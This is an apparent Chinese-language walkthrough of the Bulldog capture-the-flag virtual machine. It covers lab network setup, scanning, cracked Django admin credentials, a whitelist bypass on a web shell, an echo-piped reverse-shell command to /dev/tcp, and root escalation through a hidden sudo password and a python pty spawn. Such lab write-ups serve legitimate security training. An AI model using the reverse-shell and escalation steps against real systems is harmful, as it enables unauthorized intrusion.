环境搭建

下载链接

在 virtuallBox 中打开靶机。

virtuallBox 网络连接方式设置为仅主机。
vmware 设置桥接模式的网卡为 VirtualBox Host-Only Ethernet Adapter。
kail 网络适配设置为 NAT 和 桥接。
来自：https://blog.csdn.net/LYJ20010728/article/details/119395324?spm=1001.2014.3001.5501

如果还是有问题最简单的方法就是直接还原网络适配器的默认值。

信息收集

端口扫描：

开了个 23 端口，如果有账密，直接 telnet 登录。

目录扫描：

/admin 提醒要是员工的用户名和密码。

在 /dev 中有对网站的一些见解，比如这个网站是 Django 等等，有个 webshell 页面，不过要验证，估计有个 cookie 啥的，在源码中还有一串 hash，解密

用这个登 Django 管理页面看下。

nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com 	bulldoglover

成功

webshell 可用。

getshell

虽然说只能运行六个命令，但是我们可以用 echo 绕过。

ifconfig
ls
echo
pwd
cat
rm

反弹 shell

echo 'bash -i >& /dev/tcp/192.168.56.102/9999 0>&1' | bash

提权

在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp 中找到sudo的密码：SUPERultimatePASSWORDyouCANTget

疑似 root 密码

提示我们要在终端上，那用 python 打开一个新终端

成功 root

sudo python -c 'import pty;pty.spawn("/bin/bash")'
SUPERultimatePASSWORDyouCANTget